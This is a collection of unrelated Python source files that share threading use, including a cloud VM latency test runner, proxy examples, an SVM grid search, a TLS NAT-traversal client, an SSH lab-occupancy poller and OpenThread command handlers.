env = __env_for_singlecloud_subprocess(run_id_, cloud_region_)
process_stdout = run_subprocess(cloud_region_.script(), env)
vm_addresses = {}
vm_address_info = process_stdout
if vm_address_info[-1] == "\n":
vm_address_info = vm_address_info[:-1]
vm_address_infos = vm_address_info.split(",")
vm_addresses["address"] = vm_address_infos[0]
if len(vm_address_infos) > 1:
vm_addresses["name"] = vm_address_infos[1]
vm_addresses["zone"] = vm_address_infos[2]
vm_region_and_address_infos_inout.append((cloud_region_, vm_addresses))
def sort_addr_by_region(
vm_region_and_address_infos: List[Tuple[CloudRegion, Dict]],
regions: List[CloudRegion],
):
ret = []
for region in regions:
for_this_region = [t for t in vm_region_and_address_infos if t[0] == region]
if len(for_this_region) != 1:
logging.error(
"For region %s found this data %s. Had these VMs %s}",
region,
for_this_region,
vm_region_and_address_infos,
)
if for_this_region:
ret.append(for_this_region[0])
return ret
vm_region_and_address_infos = []
threads = []
regions_dedup = dedup(regions)
for cloud_region in regions_dedup:
thread = threading.Thread(
name=f"create-{cloud_region}",
target=create_vm,
args=(run_id, cloud_region, vm_region_and_address_infos),
)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
logging.info('create_vm in "%s" done', thread.name)
ret = sort_addr_by_region(vm_region_and_address_infos, regions)
return ret
def __do_tests(
run_id: str,
vm_region_and_address_infos: List[Tuple[CloudRegion, Dict]],
):
results_dir_for_this_runid = f"./result-files-one-run/results-{run_id}"
try:
os.mkdir(results_dir_for_this_runid)
except FileExistsError:
pass
def run_test(run_id, src: Tuple[CloudRegion, Dict], dst: Tuple[CloudRegion, Dict]):
logging.info("running test from %s to %s", src, dst)
src_region_, src_addr_infos = src
dst_region_, dst_addr_infos = dst
env = {
"PATH": os.environ["PATH"],
"RUN_ID": run_id,
"SERVER_PUBLIC_ADDRESS": dst_addr_infos["address"],
"SERVER_CLOUD": dst_region_.cloud.name,
"CLIENT_CLOUD": src_region_.cloud.name,
"SERVER_REGION": dst_region_.region_id,
"CLIENT_REGION": src_region_.region_id,
}
if src_region.cloud == Cloud.AWS:
env |= {
"CLIENT_PUBLIC_ADDRESS": src_addr_infos["address"],
"BASE_KEYNAME": "intercloudperfkey",
}
elif src_region.cloud == Cloud.GCP:
try:
env |= {
"CLIENT_NAME": src_addr_infos["name"],
"CLIENT_ZONE": src_addr_infos["zone"],
}
except KeyError as ke:
logging.error("{src_addr_infos=}")
raise ke
else:
raise Exception(f"Implement {src_region}")
non_str = [(k, v) for k, v in env.items() if type(v) != str]
assert not non_str, non_str
script = src_region.script_for_test_from_region()
process_stdout = run_subprocess(script, env)
logging.info(
"Test %s result from %s to %s is %s", run_id, src, dst, process_stdout
)
test_result = process_stdout + "\n"
result_j = json.loads(test_result)
result_j["distance"] = interregion_distance(src_region_, dst_region_)
# We write separate files for each test to avoid race conditions, since tests happen in parallel.
with open(
f"{results_dir_for_this_runid}/results-{src_region_}-to-{dst_region_}.json",
"w",
) as f:
json.dump(result_j, f)
vm_pairs: List[Tuple[Tuple[CloudRegion, Dict], Tuple[CloudRegion, Dict]]]
assert len(vm_region_and_address_infos) % 2 == 0, (
f"Must provide an even number of region in pairs for tests:"
f" was length {len(vm_region_and_address_infos)}: {vm_region_and_address_infos}"
)
vm_pairs = [
(vm_region_and_address_infos[i], vm_region_and_address_infos[i + 1])
for i in range(0, len(vm_region_and_address_infos), 2)
]
logging.info(
"%s tests and %s regions ",
len(vm_pairs),
len(vm_region_and_address_infos),
)
threads = []
for src, dest in vm_pairs:
src_region = src[0]
dst_region = dest[0]
thread_name = f"{src_region}-{dst_region}"
logging.info(f"Will run test %s", thread_name)
thread = threading.Thread(
name=thread_name, target=run_test, args=(run_id, src, dest)
)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
logging.info('"%s" done', thread.name)
combine_results_to_jsonl(results_dir_for_this_runid)
#shutil.rmtree(results_dir_for_this_runid)
def __delete_vms(run_id, regions: List[CloudRegion]):
def delete_aws_vm(aws_cloud_region: CloudRegion):
assert aws_cloud_region.cloud == Cloud.AWS, aws_cloud_region
logging.info(
"Will delete EC2 VMs from run-id %s in %s", run_id, aws_cloud_region
)
env = __env_for_singlecloud_subprocess(run_id, aws_cloud_region)
script = cloud_region.deletion_script()
_ = run_subprocess(script, env)
# First, AWS
aws_regions = [r for r in regions if r.cloud == Cloud.AWS]
threads = []
for cloud_region in aws_regions:
thread = threading.Thread(
name=f"delete-{cloud_region}", target=delete_aws_vm, args=(cloud_region,)
)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
logging.info("%s done", thread.name)
# Now GCP
gcp_regions = [r for r in regions if r.cloud == Cloud.GCP]
if gcp_regions:
cloud_region = gcp_regions[
0
] # One arbitrary region, for getting values for GCP.
logging.info("Will delete GCE VMs from run-id %s", run_id)
env = __env_for_singlecloud_subprocess(run_id, cloud_region)
_ = run_subprocess(cloud_region.deletion_script(), env)
def __setup_and_tests_and_teardown(run_id: str, regions: List[CloudRegion]):
"""regions taken pairwise"""
# Because we launch VMs and runs tests multithreaded, if one launch fails or one tests fails, run_tests() will not thrown an Exception.
# So, VMs will still be cleaned up
assert len(regions) % 2 == 0, f"Expect pairs {regions}"
vm_region_and_address_infos = __create_vms(regions, run_id)
logging.info(vm_region_and_address_infos)
__do_tests(run_id, vm_region_and_address_infos)
__delete_vms(run_id, regions)
def test_region_pairs(region_pairs: List[Tuple[CloudRegion, CloudRegion]], run_id):
write_attempted_tests(region_pairs)
regions = list(itertools.chain(*region_pairs))
__setup_and_tests_and_teardown(run_id, regions)
def main():
logging.info("Started at %s", datetime.datetime.now().isoformat())
run_id = "".join(random.choices(string.ascii_lowercase, k=4))
if len(sys.argv) > 1:
gcp_project = sys.argv[1]
else:
gcp_project = None # use default
region_pairs = untested_regionpairs()
region_pairs = remove_already_attempted(region_pairs)
region_pairs.sort()
group_size = 6
groups_ = [
region_pairs[i : i + group_size]
for i in range(0, len(region_pairs), group_size)
]
groups_ = groups_[:2] # REMOVE!
tot_len=sum(len(g) for g in groups_)
logging.info(f"Running test on only {tot_len}")
for group in groups_:
test_region_pairs(group, run_id)
jsonl_to_csv()
if __name__ == "__main__":
main()
|
pydeproxy_examples.py
|
import ssl
import urlparse
import socket
import deproxy
import tornado
from tornado import httpclient
import threading
# Example socket based responder
class CustomResponder:
def send_response(self, wfile, response):
"""
Send the given Response over the socket. Add Server and Date headers
if not already present.
"""
message = response.message
wfile.write("HTTP/1.1 %s %s\r\n" %
(response.code, message))
for name, value in response.headers.iteritems():
wfile.write("%s: %s\r\n" % (name, value))
wfile.write("\r\n")
if response.body is not None and len(response.body) > 0:
wfile.write(response.body)
if response.headers["Connection"] and response.headers["Connection"].lower == 'close':
wfile.close()
# Example socket based requestor
class CustomRequestor:
def send_request(self, url, request, ssl_options=None, verify=None):
urlparts = list(urlparse.urlsplit(url, 'http'))
scheme = urlparts[0]
host = urlparts[1]
urlparts[0] = ''
urlparts[1] = ''
path = urlparse.urlunsplit(urlparts)
hostparts = host.split(':')
if len(hostparts) > 1:
port = hostparts[1]
else:
if scheme == 'https':
port = 443
else:
port = 80
hostname = hostparts[0]
hostip = socket.gethostbyname(hostname)
request_line = '%s %s HTTP/1.1\r\n' % (request.method, path if path else '/')
print(request_line)
lines = [request_line]
for name, value in request.headers.iteritems():
lines.append('%s: %s\r\n' % (name, value))
lines.append('\r\n')
if request.body is not None and len(request.body) > 0:
lines.append(request.body)
address = (hostname, port)
if scheme == 'https':
s = self.create_ssl_connection(address)
else:
s = socket.create_connection(address)
s.send(''.join(lines))
rfile = s.makefile('rb', -1)
response_line = rfile.readline(65537)
if (len(response_line) > 65536):
raise ValueError
response_line = response_line.rstrip('\r\n')
words = response_line.split()
proto = words[0]
code = words[1]
message = ' '.join(words[2:])
response_headers = deproxy.HeaderCollection.from_stream(rfile)
body = read_body_from_stream(rfile, response_headers)
response = deproxy.Response(code, message, response_headers, body)
return response
def create_ssl_connection(self, address,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
host, port = address
err = None
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
sock = ssl.wrap_socket(sock)
if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except socket.error as _:
err = _
if sock is not None:
sock.close()
def read_body_from_stream(stream, headers):
if ('Transfer-Encoding' in headers and
headers['Transfer-Encoding'] not in ['identity', 'chunked']):
raise NotImplementedError
elif 'Transfer-Encoding' in headers and headers['Transfer-Encoding'] == 'chunked':
body = ""
while True:
line = stream.readline()
i = line.find(';') # ignore extenstions
if i >= 0:
line = line[:i]
chunk_length = int(line, 16)
if chunk_length == 0:
break
body = body + stream.read(chunk_length)
stream.read(2) # remove CRLF
elif 'Content-Length' in headers:
# 3
length = int(headers['Content-Length'])
body = stream.read(length)
elif False:
raise NotImplementedError
else:
body = None
return body
# Template naive proxy
class MainHandler(tornado.web.RequestHandler):
def get(self):
# Route by path
aux_port = self.request.path.split('/')[-1]
service_port = self.request.path.split('/')[-2]
http_client = httpclient.HTTPClient()
try:
# Generate requests to forward
aux_request = clone_request(self.request)
service_request = clone_request(self.request)
aux_request.url = "http://localhost:" + aux_port + '/' + self.request.uri
service_request.url = "http://localhost:" + service_port + '/' + self.request.uri
# Make requests
aux_response = http_client.fetch(aux_request)
service_response = http_client.fetch(service_request)
# Respond to client
self.set_status(service_response.code, service_response.reason)
for k, v in service_response.headers.get_all():
self.set_header(k,v)
self.write(service_response.body)
except httpclient.HTTPError as e:
# HTTPError is raised for non-200 responses; the response
# can be found in e.response.
# Catch possible 401 from aux service
self.set_status(e.response.code, e.response.reason)
for k, v in e.response.headers.get_all():
self.set_header(k, v)
self.write(e.response.body)
except Exception as e:
print(e)
http_client.close()
self.flush()
def clone_request(source):
return httpclient.HTTPRequest('', source.method,source.headers, None)
def make_app():
return tornado.web.Application([
(r"/.*", MainHandler),
])
def test_handler(req):
return deproxy.Response(200, message='OK')
def auth_handler(req):
if req.path.split('?')[-1] == 'true':
return deproxy.Response(200, message='OK', headers=req.headers)
else:
return deproxy.Response(401, message='OK', headers=req.headers, body='unauthorized')
def service_handler(req):
h = {'Service-Header': 'I is a service'}
h.update(req.headers)
return deproxy.Response(200, message='OK', headers=h, body="Hi! I am a service!")
#PROXY
def start_proxy():
application = make_app()
application.listen(8888)
tornado.ioloop.IOLoop.current().start()
def run_proxy():
dp = deproxy.Deproxy()
auth_port = 9997
service_port = 9998
threading.Thread(target=start_proxy).start()
auth_ep = dp.add_endpoint(port=auth_port, default_handler=auth_handler)
service_ep = dp.add_endpoint(port=service_port, default_handler=service_handler)
mc = dp.make_request(url='http://localhost:8888/{}/{}'.format(service_port, auth_port))
for handling in mc.handlings:
print(handling.request)
print(handling.response)
mc2 = dp.make_request(url='http://localhost:8888/{}/{}?true'.format(service_port, auth_port))
for handling in mc2.handlings:
print(handling.request)
print(handling.response)
print(mc.sent_request)
print(mc.received_response)
auth_ep.shutdown()
service_ep.shutdown()
def use_custom_requester_responder():
dp = deproxy.Deproxy()
ep1 = dp.add_endpoint(port=9997)
ep2 = dp.add_endpoint(port=9998, responder=CustomResponder())
ep3 = dp.add_endpoint(port=9999, set_reserved_headers=False)
mc1 = dp.make_request(url='http://localhost:9997')
mc2 = dp.make_request(url='http://localhost:9998', default_handler=test_handler)
mc3 = dp.make_request(url='http://localhost:9999', default_handler=test_handler, requestor=CustomRequestor())
print(mc1.handlings[0].request)
print(mc1.handlings[0].response)
print(mc2.handlings[0].request)
print(mc2.handlings[0].response)
print(mc3.handlings[0].request)
print(mc3.handlings[0].response)
def main():
run_proxy()
use_custom_requester_responder()
main()
|
mtprint2.py
|
import time
import threading
def hello(a, b):
time.sleep(3)
print('Hello', a, b)
if __name__ == '__main__':
for i in range(3):
t = threading.Thread(target=hello, args=('aaa', 'bbb'))
t.start() # 启动工作线程,调用target(*args)
|
gridsearch.py
|
from sklearn.metrics import confusion_matrix
from threading import Thread
import time
from Queue import Queue, Empty
import multiprocessing
from lib.in_subject_cross_validation import *
import lib.in_subject_cross_validation as libcv
import sys
import argparse
q = Queue()
# Performs recursive feature elimination until 'attribute count' has been reached
def _eliminate_features(X_test, X_train, attribute_count, y_train):
clf = LinearSVC(class_weight='auto')
rfe = RFE(clf, n_features_to_select=attribute_count, step=1)
fit = rfe.fit(X_train, y_train)
# Reduce the feature matrices to contain just the selected features
X_train = [fit.transform(X) for X in X_train]
X_test = [fit.transform(X) for X in X_test]
return X_test, X_train
def _cv_instances(Xs, ys, test_index, train_index, result_pairs, attribute_count):
# print "Cross validating with %d left out" % test_index
Xs_train, Xs_test = flatten(Xs[train_index]), flatten(Xs[test_index])
ys_train, ys_test = flatten(ys[train_index]), flatten(ys[test_index])
transformer = preprocessing.MinMaxScaler().fit(to_float(flatten(Xs)))
Xs_train = transformer.transform(to_float(Xs_train))
Xs_test = transformer.transform(to_float(Xs_test))
if attribute_count is not None:
Xs_test, Xs_train = _eliminate_features(Xs_test, Xs_train, attribute_count, ys_train)
Xs_test = flatten(Xs_test)
Xs_train = flatten(Xs_train)
clf = SVC(**SVC_parameters)
# clf = LinearSVC(class_weight='auto')
clf.fit(to_float(Xs_train), ys_train)
ys_pred = clf.predict(to_float(Xs_test))
predicted_class = list(ys_pred)
actual_class = ys_test
print "%d, %.3f" % (test_index[0], accuracy_score(actual_class, predicted_class))
# print "Finished cross validation for %d" % test_index
result_pairs.append((actual_class, predicted_class))
def threaded_worker():
while True:
try:
arguments = q.get(False)
_cv_instances(*arguments)
q.task_done()
except Empty:
break
def cross_validate_combined_dataset(Xs, ys, num_attributes=None, threaded=False):
leave_one_out = cross_validation.LeaveOneOut(len(ys))
result_pairs = []
threads = []
for train_index, test_index in leave_one_out:
if threaded:
q.put((Xs, ys, test_index, train_index, result_pairs, num_attributes))
else:
_cv_instances(Xs, ys, test_index, train_index, result_pairs, num_attributes)
if threaded:
for num in range(1, multiprocessing.cpu_count()):
print "Starting thread %d" % num
thread = Thread(target=threaded_worker)
threads.append(thread)
thread.start()
[thread.join() for thread in threads]
actual_classes = [actual for (actual, _) in result_pairs]
predicted_classes = [predicted for (_, predicted) in result_pairs]
return flatten(actual_classes), flatten(predicted_classes)
def flatten(list):
return [item for sublist in list for item in sublist]
def to_float(list):
return [[float(item) for item in sublist] for sublist in list]
def print_report(actual, attr_count, class_id, dataset, predicted):
# Print the performance to the console
conf_matrix = confusion_matrix(actual, predicted, ['low', 'high'])
print ""
print conf_matrix
scores = f1_score(actual, predicted, ['low', 'high'], 'low', average=None)
average_f1 = np.average(scores)
accuracy = accuracy_score(actual, predicted)
print "\nAverage F1 score: %.3f" % average_f1
print "Average accuracy: %.3f" % accuracy
low_ratings = [p for (idx, p) in enumerate(predicted) if actual[idx] == 'low']
high_ratings = [p for (idx, p) in enumerate(predicted) if actual[idx] == 'high']
print "Low accuracy: %.3f" % (float(low_ratings.count('low')) / len(low_ratings))
print "High accuracy: %.3f" % (float(high_ratings.count('high')) / len(high_ratings))
attr_names = ["valence", "arousal", "control"]
print "%s,leave-one-subject-out%s,%s,%s,%.3f,%.3f" % (
dataset, '' if (attr_count is None) else '-rfe', attr_names[class_id], time.strftime('%Y-%m-%d'), average_f1,
accuracy)
import numpy as np
import pylab as pl
from sklearn.svm import SVC
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import load_iris
from sklearn.cross_validation import StratifiedKFold
from sklearn.grid_search import GridSearchCV
parser = argparse.ArgumentParser(description='Perform cross-validation on the dataset, cross-validating the behavior of one specific subject.')
parser.add_argument('dataset', help='name of the dataset folder')
parser.add_argument('class_id', type=int, help='target class id, 0-2')
parser.add_argument('ground_truth_count', type=int, help='number of ground truth values, 1-3')
args = parser.parse_args()
print args
##############################################################################
# Load and prepare data set
#
# dataset for grid search
Xs, ys = libcv._load_full_dataset(args.dataset, args.class_id, args.ground_truth_count)
X = to_float(flatten(Xs))
y = flatten(ys)
# It is usually a good idea to scale the data for SVM training.
# We are cheating a bit in this example in scaling all of the data,
# instead of fitting the transformation on the training set and
# just applying it on the test set.
scaler = StandardScaler()
X = scaler.fit_transform(X)
##############################################################################
# Train classifier
#
# For an initial search, a logarithmic grid with basis
# 10 is often helpful. Using a basis of 2, a finer
# tuning can be achieved but at a much higher cost.
C_range = 10.0 ** np.arange(-1, 5)
param_grid = dict(C=C_range)
cv = StratifiedKFold(y=y, n_folds=3)
grid = GridSearchCV(SVC(kernel='linear'), param_grid=param_grid, cv=cv, n_jobs=-1)
grid.fit(X, y)
print("The best classifier is: ", grid.best_estimator_)
|
tlsc.py
|
#!/usr/bin/env python
import sys
import logging
import socket
import struct
from threading import Event, Thread
from util import *
import ssl
logger = logging.getLogger('client')
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(message)s')
STOP = Event()
c_cont=ssl.create_default_context()
s_cont=ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def accept(port):
logger.info("accept %s", port)
s = create_socket()
s.bind(('', port))
s.listen(1)
s.settimeout(5)
while not STOP.is_set():
try:
conn, addr = s.accept()
except socket.timeout:
continue
else:
logger.info("Accept %s connected!", port)
# STOP.set()
def connect(local_addr, addr):
logger.info("connect from %s to %s", local_addr, addr)
s = create_socket()
s.bind(local_addr)
while not STOP.is_set():
try:
s.connect(addr)
except socket.error:
continue
# except Exception as exc:
# logger.exception("unexpected exception encountered")
# break
else:
logger.info("connected from %s to %s success!", local_addr, addr)
# STOP.set()
def main(host='54.187.46.146', port=5005):
sa = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sa.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sa.connect((host, port))
sa=c_cont.wrap_socket(sa,server_hostname=host)
priv_addr = sa.getsockname()
send_msg(sa, addr_to_msg(priv_addr))
data = recv_msg(sa)
logger.info("client %s %s - received data: %s", priv_addr[0], priv_addr[1], data)
pub_addr = msg_to_addr(data)
send_msg(sa, addr_to_msg(pub_addr))
data = recv_msg(sa)
pubdata, privdata = data.split(b'|')
client_pub_addr = msg_to_addr(pubdata)
client_priv_addr = msg_to_addr(privdata)
logger.info(
"client public is %s and private is %s, peer public is %s private is %s",
pub_addr, priv_addr, client_pub_addr, client_priv_addr,
)
threads = {
'0_accept': Thread(target=accept, args=(priv_addr[1],)),
'1_accept': Thread(target=accept, args=(client_pub_addr[1],)),
'2_connect': Thread(target=connect, args=(priv_addr, client_pub_addr,)),
'3_connect': Thread(target=connect, args=(priv_addr, client_priv_addr,)),
}
for name in sorted(threads.keys()):
logger.info('start thread %s', name)
threads[name].start()
while threads:
keys = list(threads.keys())
for name in keys:
try:
threads[name].join(1)
except TimeoutError:
continue
if not threads[name].is_alive():
threads.pop(name)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, message='%(asctime)s %(message)s')
main(*addr_from_args(sys.argv))
|
labScan.py
|
import paramiko
from multiprocessing import Process, Queue
import datetime
import config
import pickle
import os.path
import math
import re
import discord
import botClient as bc
import asyncio
import time
import threading
import sys
class LabScan():
def __init__(self, configfile):
self.labs = {}
self.mins = []
self.configfile = configfile
self.bot = None
self.newLabs = False
self.lock = threading.Lock()
self.quit = False
try:
labt = pickle.load( open( "./persistence/labs.p", "rb" ) )
self.lock.acquire()
self.labs = labt[0]
self.mins = labt[1]
self.lock.release()
print("Labs successfully loaded.")
except:
print("No labs to load")
def pollLabs(self):
sp = 2
creds = config.getCreds(self.configfile)
logfile = "./persistence/"+config.getLogfile(self.configfile)
keyfile = "./persistence/"+config.getKeyfile(self.configfile)
while True:
print("Starting scan at {}".format(str(datetime.datetime.now())), flush=True)
mini = 100
mins = []
for room in [218,219,220,221,232]:
print("lab" + str(room) + ":\n ", end='', flush=True)
for row in range(1,7):
print( " 0" + str(row), end='', flush=True)
print("")
for column in "abcd":
print("-" + str(column), end='', flush=True)
line = ""
for row in range(1,7):
try:
users = -1
host = "lab{}-{}0{}.cs.curtin.edu.au.".format(room,column,row)
q = Queue()
proc = Process(target=checkLab, args=(host,q,creds,keyfile))
proc.start()
try:
users = q.get(timeout=2)
proc.join()
except Exception as err:
try:
proc.terminate()
except:
pass
self.lock.acquire()
self.labs[host] = users
self.lock.release()
if (users>-1 and users < mini):
mini = users
mins = []
if (users == mini):
mins.append(host)
line += " " + str((" ",users)[users!=-1]) + pad(users,sp)
except:
pass
print(line,flush=True)
self.lock.acquire()
self.mins = mins
print("Finishing scan at {}".format(str(datetime.datetime.now())), flush=True)
max = -1
for lab in sorted(self.labs,key=self.labs.get):
if self.labs[lab] > max:
max = self.labs[lab]
if max == -1:
#print("All labs down, loading from backup", flush=True)
#labt = pickle.load( open( "./persistence/labs.p", "rb" ) )
#self.labs = labt[0]
#self.mins = labt[1]
print("All labs appear down, restarting", flush=True)
sys.exit()
else:
print("Saving up machines to file", flush=True)
pickle.dump( (self.labs,self.mins), open ("./persistence/labs.p", "wb" ) )
logStr = ""
if os.path.isfile(logfile):
print("Log file exists, appending", flush=True)
logStr += "{},".format(str(datetime.datetime.now()))+","
for lab in sorted(self.labs.keys()):
logStr += str(self.labs[lab]) + ","
logStr = logStr[:-1]
elif not os.path.isdir(logfile):
print("Log file specified but none existant, creating", flush=True)
dataStr = "{},".format(str(datetime.datetime.now()))
logStr += "Time,"
for lab in sorted(self.labs.keys()):
logStr += lab.split(".")[0][3:] + ","
dataStr += str(self.labs[lab]) + ","
logStr = logStr[:-1] + "\n" + dataStr[:-1]
if not logStr == "":
try:
with open(logfile,"a") as f:
f.write(logStr+"\n")
print("Log file successfully written to.", flush=True)
except:
print("Log file unable to be written to", flush=True)
else:
print("Log file not specified", flush=True)
self.lock.release()
if self.bot:
if self.bot.eloop:
self.bot.eloop.create_task(self.bot.updatePMsg())
#self.newLabs = True
#asyncio.create_task(self.bot.updatePMsg())
time.sleep(300)
def checkLab( host, temp, creds, keyfile ):
sshclient = paramiko.SSHClient()
sshclient.set_missing_host_key_policy(paramiko.AutoAddPolicy)
try:
sshclient.connect(host, username=creds[0], password=creds[1], timeout=1, banner_timeout=1, auth_timeout=1, key_filename=keyfile)
stdin, stdout, stderr = sshclient.exec_command('who | wc -l',timeout=1)
for line in stderr:
#print(line.strip('\n'))
pass
for line in stdout:
#print(line.strip('\n'))
temp.put(int(line.strip('\n'))-1)
sshclient.close()
except:
pass
def pad(inte,places):
if inte < 1:
padding = places-1
else:
padding = (places-int(1+math.log10(abs(inte))))
return " " * padding
|
command_handlers.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2020, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import logging
import queue
import re
import threading
import time
from abc import abstractmethod
from typing import Any, Callable, Optional, Union, List, Pattern
from .connectors import OtCliHandler
from .errors import ExpectLineTimeoutError, CommandError
from .utils import match_line
class OTCommandHandler:
"""This abstract class defines interfaces of a OT Command Handler."""
@abstractmethod
def execute_command(self, cmd: str, timeout: float) -> List[str]:
"""Method execute_command should execute the OT CLI command within a timeout (in seconds) and return the
command output as a list of lines.
Note: each line SHOULD NOT contain '\r\n' at the end. The last line of output should be 'Done' or
'Error <code>: <msg>' following OT CLI conventions.
"""
pass
@abstractmethod
def close(self):
"""Method close should close the OT Command Handler."""
pass
@abstractmethod
def wait(self, duration: float) -> List[str]:
"""Method wait should wait for a given duration and return the OT CLI output during this period.
Normally, OT CLI does not output when it's not executing any command. But OT CLI can also output
asynchronously in some cases (e.g. `Join Success` when Joiner joins successfully).
"""
pass
@abstractmethod
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
"""Method set_line_read_callback should register a callback that will be called for every line
output by the OT CLI.
This is useful for handling asynchronous command output while still being able to execute
other commands.
"""
pass
def shell(self, cmd: str, timeout: float) -> List[str]:
raise NotImplementedError("shell command is not supported on %s" % self.__class__.__name__)
class OtCliCommandRunner(OTCommandHandler):
__PATTERN_COMMAND_DONE_OR_ERROR = re.compile(
r'(Done|Error|Error \d+:.*|.*: command not found)$') # "Error" for spinel-cli.py
__PATTERN_LOG_LINE = re.compile(r'((\[(NONE|CRIT|WARN|NOTE|INFO|DEBG)\])'
r'|(-.*-+: )' # e.g. -CLI-----:
r')')
"""regex used to filter logs"""
__ASYNC_COMMANDS = {'scan', 'ping', 'discover'}
def __init__(self, otcli: OtCliHandler, is_spinel_cli=False):
self.__otcli: OtCliHandler = otcli
self.__is_spinel_cli = is_spinel_cli
self.__expect_command_echoback = not self.__is_spinel_cli
self.__line_read_callback = None
self.__pending_lines = queue.Queue()
self.__should_close = threading.Event()
self.__otcli_reader = threading.Thread(target=self.__otcli_read_routine)
self.__otcli_reader.setDaemon(True)
self.__otcli_reader.start()
def __repr__(self):
return repr(self.__otcli)
def execute_command(self, cmd, timeout=10) -> List[str]:
assert not self.__should_close.is_set(), "OT CLI is already closed."
self.__otcli.writeline(cmd)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
self.__otcli.writeline('extaddr')
self.wait(1)
return []
if self.__expect_command_echoback:
self.__expect_line(timeout, cmd)
output = self.__expect_line(timeout,
OtCliCommandRunner.__PATTERN_COMMAND_DONE_OR_ERROR,
asynchronous=cmd.split()[0] in OtCliCommandRunner.__ASYNC_COMMANDS)
return output
def wait(self, duration: float) -> List[str]:
self.__otcli.wait(duration)
output = []
try:
while True:
line = self.__pending_lines.get_nowait()
output.append(line)
except queue.Empty:
pass
return output
def close(self):
self.__should_close.set()
self.__otcli.close()
self.__otcli_reader.join()
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
#
# Private methods
#
def __expect_line(self, timeout: float, expect_line: Union[str, Pattern], asynchronous=False) -> List[str]:
output = []
if not asynchronous:
while True:
try:
line = self.__pending_lines.get(timeout=timeout)
except queue.Empty:
raise ExpectLineTimeoutError(expect_line)
output.append(line)
if match_line(line, expect_line):
break
else:
done = False
while not done and timeout > 0:
lines = self.wait(1)
timeout -= 1
for line in lines:
output.append(line)
if match_line(line, expect_line):
done = True
break
if not done:
raise ExpectLineTimeoutError(expect_line)
return output
def __otcli_read_routine(self):
while not self.__should_close.is_set():
try:
line = self.__otcli.readline()
except Exception:
if self.__should_close.is_set():
break
else:
raise
logging.debug('%s: %r', self.__otcli, line)
if line is None:
break
if line.startswith('> '):
line = line[2:]
if self.__line_read_callback is not None:
self.__line_read_callback(line)
logging.debug('%s: %s', self.__otcli, line)
if not OtCliCommandRunner.__PATTERN_LOG_LINE.match(line):
self.__pending_lines.put(line)
class OtbrSshCommandRunner(OTCommandHandler):
def __init__(self, host, port, username, password, sudo):
import paramiko
self.__host = host
self.__port = port
self.__sudo = sudo
self.__ssh = paramiko.SSHClient()
self.__ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.__line_read_callback = None
try:
self.__ssh.connect(host,
port=port,
username=username,
password=password,
allow_agent=False,
look_for_keys=False)
except paramiko.ssh_exception.AuthenticationException:
if not password:
self.__ssh.get_transport().auth_none(username)
else:
raise
def __repr__(self):
return f'{self.__host}:{self.__port}'
def execute_command(self, cmd: str, timeout: float) -> List[str]:
sh_cmd = f'ot-ctl {cmd}'
if self.__sudo:
sh_cmd = 'sudo ' + sh_cmd
output = self.shell(sh_cmd, timeout=timeout)
if self.__line_read_callback is not None:
for line in output:
self.__line_read_callback(line)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
return output
def shell(self, cmd: str, timeout: float) -> List[str]:
cmd_in, cmd_out, cmd_err = self.__ssh.exec_command(cmd, timeout=int(timeout), bufsize=1024)
errput = [l.rstrip('\r\n') for l in cmd_err.readlines()]
output = [l.rstrip('\r\n') for l in cmd_out.readlines()]
if errput:
raise CommandError(cmd, errput)
return output
def close(self):
self.__ssh.close()
def wait(self, duration: float) -> List[str]:
time.sleep(duration)
return []
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
|
test_throttle.py
|
#!@PYTHON_EXECUTABLE@
# MIT License
#
# Copyright (c) 2018, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory (subject to receipt of any
# required approvals from the U.S. Dept. of Energy). All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
